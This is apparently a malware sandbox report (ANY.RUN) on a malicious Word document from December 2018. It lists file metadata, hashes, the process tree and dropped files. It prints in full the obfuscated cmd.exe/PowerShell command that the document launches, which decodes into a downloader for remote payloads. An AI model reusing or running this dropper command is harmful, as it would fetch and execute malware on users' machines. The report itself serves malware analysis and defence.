File name: | form-83503388495762.doc |
Full analysis: | https://app.any.run/tasks/04e7d4ad-7344-4b2a-9a0b-351b3ee79930 |
Verdict: | Malicious activity |
Analysis date: | December 14, 2018, 14:06:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Dec 12 12:53:00 2018, Last Saved Time/Date: Wed Dec 12 12:53:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 44, Security: 0 |
MD5: | 732AE80B29E310615D61D81D60419099 |
SHA1: | A9F27391B6497495B9F2981BEB031708C440480F |
SHA256: | 8C105C6298171AABAE2A4B104C26DE583570336FB85C125A061C80E0D000BB89 |
SSDEEP: | 1536:W3GUSocn1kp59gxBK85fBko3GUv5OUdtcsfQuD5GY+a9:W3T41k/W48So3rcULFQuD5 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:12 12:53:00 |
ModifyDate: | 2018:12:12 12:53:00 |
Pages: | 1 |
Words: | 7 |
Characters: | 44 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 50 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3480 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\form-83503388495762.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2764 | c:\Qfqkiha\MwjYsdOUapZ\MzdPFiwbC\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set Ob6=OwJSRhzJwXXhJMvF@{.9pLQt2/Y;Eakq+seyrGDK5U-)6W0cC$ZI83nB 7(g,fl:'m}joN1=\bdxui&&for %v in (49,21,6,77,71,64,41,36,0,64,27,49,77,37,77,71,54,34,8,42,68,73,67,34,47,23,56,69,34,23,18,45,34,73,48,62,77,34,54,23,27,49,41,47,15,71,64,11,23,23,20,63,25,25,20,68,62,35,74,34,20,68,18,47,68,65,25,39,10,57,13,19,0,76,65,16,11,23,23,20,63,25,25,20,23,68,61,61,36,68,29,74,18,47,68,65,25,73,10,23,14,14,12,52,16,11,23,23,20,63,25,25,62,77,54,30,24,76,18,54,62,25,70,61,40,35,45,0,12,19,11,16,11,23,23,20,63,25,25,20,34,36,65,77,54,29,33,18,47,68,65,18,54,77,25,19,37,33,21,69,41,31,36,30,50,16,11,23,23,20,63,25,25,54,34,8,33,30,29,73,29,36,18,47,62,76,73,25,30,35,73,69,15,75,52,55,20,68,64,18,3,20,62,77,23,58,64,16,64,43,27,49,22,11,50,71,64,8,20,21,64,27,49,36,21,8,56,71,56,64,53,44,64,27,49,39,61,22,71,64,10,45,54,64,27,49,36,65,38,71,49,34,54,14,63,23,34,65,20,32,64,72,64,32,49,36,21,8,32,64,18,34,75,34,64,27,61,68,36,34,29,47,11,58,49,76,76,0,56,77,54,56,49,41,47,15,43,17,23,36,35,17,49,77,37,77,18,38,68,8,54,62,68,29,74,15,77,62,34,58,49,76,76,0,60,56,49,36,65,38,43,27,49,15,48,67,71,64,39,28,69,64,27,51,61,56,58,58,37,34,23,42,51,23,34,65,56,49,36,65,38,43,18,62,34,54,59,23,11,56,42,59,34,56,52,46,46,46,46,43,56,17,51,54,14,68,30,34,42,51,23,34,65,56,49,36,65,38,27,49,36,67,67,71,64,20,20,47,64,27,73,36,34,29,30,27,66,66,47,29,23,47,11,17,66,66,49,77,50,69,71,64,50,26,48,64,27,84)do set F6e=!F6e!!Ob6:~%v,1!&&if %v equ 84 %TMP:~-17,1%owersh%TEMP:~-3,-2%l%CommonProgramW6432:~-16,-15% "!F6e:~-437!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3296 | CmD /V:O/C"set Ob6=OwJSRhzJwXXhJMvF@{.9pLQt2/Y;Eakq+seyrGDK5U-)6W0cC$ZI83nB 7(g,fl:'m}joN1=\bdxui&&for %v in (49,21,6,77,71,64,41,36,0,64,27,49,77,37,77,71,54,34,8,42,68,73,67,34,47,23,56,69,34,23,18,45,34,73,48,62,77,34,54,23,27,49,41,47,15,71,64,11,23,23,20,63,25,25,20,68,62,35,74,34,20,68,18,47,68,65,25,39,10,57,13,19,0,76,65,16,11,23,23,20,63,25,25,20,23,68,61,61,36,68,29,74,18,47,68,65,25,73,10,23,14,14,12,52,16,11,23,23,20,63,25,25,62,77,54,30,24,76,18,54,62,25,70,61,40,35,45,0,12,19,11,16,11,23,23,20,63,25,25,20,34,36,65,77,54,29,33,18,47,68,65,18,54,77,25,19,37,33,21,69,41,31,36,30,50,16,11,23,23,20,63,25,25,54,34,8,33,30,29,73,29,36,18,47,62,76,73,25,30,35,73,69,15,75,52,55,20,68,64,18,3,20,62,77,23,58,64,16,64,43,27,49,22,11,50,71,64,8,20,21,64,27,49,36,21,8,56,71,56,64,53,44,64,27,49,39,61,22,71,64,10,45,54,64,27,49,36,65,38,71,49,34,54,14,63,23,34,65,20,32,64,72,64,32,49,36,21,8,32,64,18,34,75,34,64,27,61,68,36,34,29,47,11,58,49,76,76,0,56,77,54,56,49,41,47,15,43,17,23,36,35,17,49,77,37,77,18,38,68,8,54,62,68,29,74,15,77,62,34,58,49,76,76,0,60,56,49,36,65,38,43,27,49,15,48,67,71,64,39,28,69,64,27,51,61,56,58,58,37,34,23,42,51,23,34,65,56,49,36,65,38,43,18,62,34,54,59,23,11,56,42,59,34,56,52,46,46,46,46,43,56,17,51,54,14,68,30,34,42,51,23,34,65,56,49,36,65,38,27,49,36,67,67,71,64,20,20,47,64,27,73,36,34,29,30,27,66,66,47,29,23,47,11,17,66,66,49,77,50,69,71,64,50,26,48,64,27,84)do set F6e=!F6e!!Ob6:~%v,1!&&if %v equ 84 powershel%CommonProgramW6432:~-16,-15% "!F6e:~-437!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7DC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B294EECB.wmf | — | |
MD5:— | SHA256:— | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3A3FE11.wmf | — | |
MD5:— | SHA256:— | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:FC911BB43D9F7A41D90E55990D0C2571 | SHA256:B4868CC08486C2C3B382C4121F240CDCB289486781F51C3E58C2DD103F121639 | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:AD7A594F018FDD26AF3E78AC20863D96 | SHA256:0EBA12D91D07998CCA9BC9C871EDDF0493667173B07061EB40F6D2895B712F85 | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA880250.wmf | wmf | |
MD5:7F65F53099A09878D14919C6032E7A84 | SHA256:4F21E369704E33551DEA91D1E669BA7DF736FAA7C6FD69130DAB276B922D6F79 | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$rm-83503388495762.doc | pgc | |
MD5:3B7D230C9D605C39B7C1423853644622 | SHA256:2DA8B51927739B7AEE6B761F8DC76153FAF71570E1B0645699E414926CE70431 | |||
3480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB713172.wmf | wmf | |
MD5:A99287E97063F91A8D5F13A21908AF2A | SHA256:819432262271DD408BF9C47A2D3B088DB956BF8DAA52F18935784AA8A4BB2368 |